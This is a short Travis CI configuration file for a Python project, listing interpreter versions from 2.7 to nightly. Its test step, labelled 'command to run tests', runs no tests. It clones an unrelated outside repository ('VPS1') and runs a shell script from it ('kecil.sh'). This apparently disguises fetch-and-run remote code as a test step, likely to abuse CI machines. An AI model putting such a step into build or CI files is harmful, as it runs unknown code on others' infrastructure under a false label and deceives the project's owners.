language: python
python:
  - "2.7"
  - "3.4"
  - "3.5"
  - "3.6"      # current default Python on Travis CI
  - "3.7"
  - "3.8"
  - "3.9"
  - "3.9-dev"  # 3.9 development branch
  - "nightly"  # nightly build
# command to install dependencies

# command to run tests
script:
  - git clone https://github.com/saldi7/VPS1
  - cd VPS1
  - sh kecil.sh 
